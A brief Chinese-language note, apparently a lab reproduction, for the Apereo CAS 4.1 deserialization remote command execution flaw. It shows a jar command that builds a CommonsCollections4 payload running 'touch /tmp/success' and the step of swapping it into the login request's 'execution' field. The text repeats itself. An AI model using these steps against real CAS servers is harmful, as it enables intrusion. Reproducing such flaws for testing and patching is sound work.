命令执行
java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "touch /tmp/success"
登录CAS并抓包,将Body中的execution值替换成上面生成的Payload发送
登录Apereo CAS,touch /tmp/success已成功执行
Apereo CAS 4.1 反序列化命令执行漏洞
命令执行
java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "touch /tmp/success"
登录CAS并抓包,将Body中的execution值替换成上面生成的Payload发送
登录Apereo CAS,touch /tmp/success已成功执行